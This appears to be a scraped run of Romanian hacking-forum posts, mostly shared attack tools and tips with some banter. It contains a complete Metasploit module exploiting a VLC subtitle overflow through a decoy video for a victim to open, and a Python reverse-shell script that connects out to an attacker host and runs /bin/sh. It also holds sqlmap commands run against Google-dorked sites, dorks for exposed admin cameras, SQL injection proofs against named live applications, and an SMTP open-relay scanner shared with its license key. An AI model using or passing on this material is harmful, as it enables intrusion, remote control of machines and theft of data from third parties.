backdoor

Pentru ca am avut o discutie cu cineva pe forum care a sustinut tare ca nu se poate .... # facem backup la vechiul sqlmap - in caz ca ne ragandim sau ceva merge prost (ex: versiunea de pe svn nu functioneaza) root@bt# cd /pentest/database/ root@bt# tar -cvf sqlmap.tar sqlmap root@bt# rm -rf sqlmap/ # Descarcam noua versiune de pe SVN root@bt# svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap

Google dork allinurl:index.php?option=com_ponygallery manual sqlmap: /sqlmap.py --dbms=mysql -p Itemid -u "http://website.com/index.php?option=com_ponygallery&func=viewcategory&catid=4&Itemid=56" sqlmap automation: ./sqlmap.py --dbms=mysql -p Itemid -g allinurl:index.php?option=com_ponygallery

Interesanta descoperire. Pt cei care stiu cu ce se manaca backtrack : cum te conectezi la un backtrack prin retea cand sigurul serviciu este postgresql cu bind 127.0.0.1 ? Cat despre disctutia offtopic de mai sus: Ce conteaza pe ce OS au pus utilitarele ? Probabil ca au ales uBuntu tocmai pt ca kernelul e compilat cu full support pentru cam tot ce misca networking/video/sound .

Adevarul e ca mi se pare super inteligenta ideea. Asta e misto de pus intr-o aplicatie de FaceBook .

napo - daca SysAdmin-ul doarme ... cine ai vrea sa updateze vnc-ul ? WINDOWS UPDATE ? DOHH !!! PS: si eu care credeam ca e un Makefile exploit

Holographic Frumos tutorial . Cand mai ai timp poate ne mai arati ceva interesant. me.mello Mai bine sa nu ii stii pe acesti utilizatori Ar fi indicat ...

Ce imi plac requesturile astea gen script kiddie : Nu poti sa imi faci si mie ceva ca eu stiu doar sa folosesc mouse-ul ... Iti dau alocatia Ma prostituez pe internet ? F1 F1 F1 !

Te-ar mira sa afli cati inca mai folosesc client/server de acum 2-3 ani ...

Google Dork inurl:admin/view.cgi intitle:Wireless alte modele inurl:admin/view.cgi intitle:Camera

wrathofgod fii si tu contructiv si pune ceva la share... de palavre suntem satui cu totii , 10k , 1k ce mai conteaza... cine cauta gaseste !

Sincer mi se pare cea mai de kkt C&C ever. O idee noua dar foarte proasta. De ex daca vrei sa dai un scan la un network trimiti un SMS. daca vrei sa vezi rezultatul .... primiesti un flood de SMS'uri.

## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT def initialize(info = {}) super(update_info(info, 'Name' => 'VLC Media Player RealText Subtitle Overflow', 'Description' => %q{ This module exploits a stack buffer overflow vulnerability in VideoLAN VLC < 0.9.6. The vulnerability exists in the parsing of RealText subtitle files. In order to exploit this, this module will generate two files: The .mp4 file is used to trick your victim into running. The .rt file is the actual malicious file that triggers the vulnerability, which should be placed under the same directory as the .mp4 file. }, 'License' => MSF_LICENSE, 'Author' => [ 'Tobias Klein', # Vulnerability Discovery 'SkD', # Exploit 'juan vazquez' # Metasploit Module ], 'Version' => '$Revision: $', 'References' => [ [ 'OSVDB', '49809' ], [ 'CVE', '2008-5036' ], [ 'BID', '32125' ], [ 'URL', 'http://www.trapkit.de/advisories/TKADV2008-011.txt' ], [ 'URL', 'http://www.videolan.org/security/sa0810.html' ] ], 'Payload' => { 'Space' => 1900, 'DisableNops' => true, 'BadChars' => "\x00\x22\x0a", 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500 }, 'Platform' => 'win', 'Targets' => [ [ 'VLC 0.9.4 on Windows XP SP3 / Windows 7 SP1', { 'Ret' => 0x68f0cfad, # jmp esp # libqt4_plugin.dll 'WritableAddress' => 0x695d5890 # libqt4_plugin.dll .data } ], ], 'Privileged' => false, 'DisclosureDate' => 'Nov 05 2008', 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [ true, 'The file name.', 'msf.rt']), ], self.class) end def generate_mp4 mp4 = '' # ftyp mp4 << "\x00\x00\x00\x14" #Size mp4 << "ftyp" #Type mp4 << "isom" #Major brand mp4 << "\x00\x00" #version mp4 << "\x00\x00" mp4 << "mp41" #Compatible brands # moov mp4 << "\x00\x00\x00\x9f" #Size mp4 << "moov" #Type mp4 << "\x00\x00\x00\x6c\x6d\x76\x68\x64\x00\x00\x00\x00\xcb\x75\xf1\xc2\xcb\x75\xf1\xc2" mp4 << "\x00\x01\x5f\x90\x00\x00\x00\x00\x00\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" mp4 << "\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" mp4 << "\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00" mp4 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" mp4 << "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x2b" mp4 << "udta" mp4 << "\x00\x00\x00\x23" mp4 << "\xa9\x65\x6e\x63\x00\x17\x00\x00" mp4 << "vlc 0.9.4 stream output" # wide mp4 << "\x00\x00\x00\x08" mp4 << "wide" # mdat mp4 << "\x00\x00\x00\x08" mp4 << "mdat" return mp4 end def generate_rt my_payload = "" my_payload << Rex::Text.rand_text(72, payload_badchars) my_payload << [target.ret].pack("V") # EIP => jmp esp my_payload << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $+8").encode_string # ESP => jmp after "Writable address" my_payload << Rex::Text.rand_text(2, payload_badchars) my_payload << [target['WritableAddress']].pack("V") # Writable address my_payload << payload.encoded rt_file = <<-eos <window height="250" width="300" duration="15" bgcolor="yellow"> Mary had a little lamb, <br/><time begin="#{my_payload}"/> <br/><time begin="6"/>little lamb, <br/><time begin="9"/>Mary had a little lamb <br/><time begin="12"/>whose fleece was white as snow. </window> eos return rt_file end def exploit mp4 = generate_mp4 rt = generate_rt print_status("Creating '#{datastore['FILENAME']}'. Put this file under the same directory as the mp4 file") file_create(rt) original_fname = datastore['FILENAME'] datastore['FILENAME'] = original_fname.scan(/(\w+).\w+/).flatten[0] + ".mp4" print_status("Creating '#{datastore['FILENAME']}'. This is the file your victim should open.") file_create(mp4) datastore['FILENAME'] = original_fname end end Sursa aici

Mi se pare corect sa pui linkul de download de pe situl orificial Download

This is a small connect-back script written in Python. #!/usr/bin/python # This was written for educational purpose and pentest only. Use it at your own risk. # Author will be not responsible for any damage! # !!! Special greetz for my friend sinner_01 !!! # Toolname : darkBC.py # Coder : baltazar a.k.a b4ltazar < b4ltazar@gmail.com> # Version : 0.1 # Greetz for rsauron and low1z, great python coders # greetz for d3hydr8, r45c4l, qk, fx0, Soul, MikiSoft, c0ax, b0ne and all members of ex darkc0de.com, ljuska.org & darkartists.info # import sys, socket, os, subprocess host = sys.argv[1] port = int(sys.argv[2]) socket.setdefaulttimeout(60) def bc(): try: sok = socket.socket(socket.AF_INET,socket.SOCK_STREAM) sok.connect((host,port)) sok.send(''' b4ltazar@gmail.com Ljuska.org \n\n''') os.dup2(sok.fileno(),0) os.dup2(sok.fileno(),1) os.dup2(sok.fileno(),2) os.dup2(sok.fileno(),3) shell = subprocess.call(["/bin/sh","-i"]) except socket.timeout: print "[!] Connection timed out" except socket.error, e: print "[!] Error while connecting", e bc() Sursa : aici

In The Name Of Allah ============================================================================== e-Rapido v3.3.2 SQL Injuction ============================================================================== [»] Title : [ e-Rapido v3.3.2 SQL Injuction ] [»] Author : [ HackStorm } [»] Email : [ HackStorm@live.com ] [»] Date : [ 23/2/2012 ] [»] Version : [ e-Rapido v3.3.2 ] [»] Home : [wWw.SA3eKA.COM [»] Google Dork: [ inurl:"filemanager/browser/custom/index.php?id=" ] $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ -[Exploit]-: * TARGET/erapido/js/fckeditor/editor/filemanager/browser/custom/index.php?id=[SQL] Sursa: aici

Speed SMTP Scaner este un scaner pentru serverele de SMTP, care scaneaz? o raze de IP'uri ?i cauta OPEN RELAY SMTP (care permit trimiterea de email-uri fara autentificare). Arhiva contine si Serial License. Distractie placuta. PS: Unii provideri din Romanica blocheaza portul 25 incoming si outgoing. F bun pt un server 2k , 2k3 pe care nu intra adminul f des.

Auto root-erul tau nu face 2 bani, script kiddie ! Oricum frumoasa intentia.

Title: ====== Facebook view my calendar - SQL Injection Vulnerability Date: ===== 2012-02-14 References: =========== http://www.Ninja-Sec.com Introduction: ============= The application is currently included and viewable by all facebook users. The service is an external 3rd party application sponsored by the Facebook view my calendar Development Team. (Copy from the Vendors Homepage: http://apps.facebook.com/viewmycalendar/) Facebook is a social networking service and website launched in February 2004, operated and privately owned by Facebook, Inc. As of July 2011, Facebook has more than 750 million active users. Users may create a personal profile, add other users as friends, and exchange messages, including automatic notifications when they update their profile. Facebook users must register before using the site. Additionally, users may join common-interest user groups, organized by workplace, school or college, or other characteristics. (Copy of the Vendor Website: http://en.wikipedia.org/wiki/Facebook) Abstract: ========= Ninja-Sec discovered a remote SQL Injection vulnerability on the 3rd party web application - Facebook Life Smile (apps.facebook.com). Report-Timeline: ================ 2012-02-02: Vendor Notification 2012-02-02: Developer Notification 2012-02-04: Public or Non-Public Disclosure Status: ======== Published Exploitation-Technique: ======================= Remote Severity: ========= High Details: ======== A remote SQL Injection vulnerability is detected on the Facebook Life Smile (apps.facebook). The vulnerability allows an attacker (remote) to inject/execute own sql statements on the affected fb application dbms. Vulnerable Module(s): [+] Life Smile - Facebook 3rd Party Application Vulnerable Param(s)/File(s): [+] index.php Affected Application: [+] apps.facebook.com/viewmycalendar/ Sql Error --- Fatal error: Uncaught exception 'PDOException' with message 'SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by mon ASC' at line 3' in /home/ashishl/public_html/calendar/index.php:157 Stack trace: #0 /home/ashishl/public_html/calendar/index.php(157): PDOStatement->execute() #1 {main} thrown in /home/ashishl/public_html/calendar/index.php on line 157 ---- Proof of Concept: ================= The vulnerability can be exploited by remote attackers. For demonstration or reproduce ... URL: http://apps.facebook.com/ Path: /viewmycalendar/ File: index.php Example: http://[APP-SERVER]/[SERVICE-APP]/[FILE].[PHP]?=[SQL Injection] PoC: http://apps.facebook.com/viewmycalendar/index.php?page=[SQL-Injection] Real World Demo : http://apps.facebook.com/viewmycalendar/index.php?page=1' Risk: ===== The security risk of the application sql injection vulnerabilities are estimated as high(+). Credits: ======== Ninja-Sec Research Laboratory - Mohamed Saad (Anti-Trust) Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Ninja-Sec disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Ninja-Sec or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Ninja-Sec.com or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Ninja-Sec. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Ninja-Sec or its suppliers. Copyright © 2012|Ninja-Sec -- Website: www.Ninja-Sec.com Contact: NinjaSec007@gmail.com Sursa: Facebook View My Calendar SQL Injection ? Packet Storm

1. Da , e vb de mysql care ruleaza pe acelasi host cu serverul 2. Sistemele de baze de date distribuie nu se pun cu fundul in internet. EX: zi-mi si mie pe ce host / port gasesc baza de date de la google.ro (search engine) - indiferent ce tip ar fi ea. PS: De obicei sistemele corporate sunt suficient de bine securizate , pt ca adminii aia respecta niste standarde ISO pt care au fost certificati si angajati. Mysql-uri lasate in curu gol pe internet o sa gasesti tot la un muritor de rand , care si-a pus si el situl firmei si foloseste in acelasi timp serverul pt development. @co4ie nu am citit cu prea multa atentie , oricum ma bucur ca e pentru mizeria de debian. Sa vina mai repede ca am un preten si poate ne iubim un pic. Let us know as soon as possible ! Have a nice day!

Da Nitro ai dreptate . O fi , super tare exploitul . Acum am si eu o curiozitate ce OS are PHP 5.4.0RC6 ?????????????? Chiar as vrea sa il testez !

O fi el chior ... sau nu ... dar nici linkul tau ionutz15 nu functioneaza...

1. SQLMAP functioneaza pentru: MSSQL , MYSQL , ORACLE. Pentru a forta testele sa se faca pt mysql folosesti ./sqlmap.py --dbms=mysql 2. Nu stiu cum ii faci tu update. Eu folosesc "UPDATE MANAGER" de la ubuntu ... Acelasi lucru poti sa il faci cu La fel de bine . Poti sa descarci sqlmap de pe sqlmap: automatic SQL injection and database takeover tool : Complicat ? HUH !

sizeof(int) pe 33 biti cat are ? 12 cm ?

Ma tu ai ramas corijent . Ha ha ha...

Da , dar ca sa faci cu AutoIT trebuie sa citesti manuale , sa "iti pierzi vremea" criind cod. Da poate il face cineva gratis.... Nu observati ca 3v1lM1nD nu a mai raspuns de pe 02-06-2012, 03:41 PM . Macar un multumesc pt idee.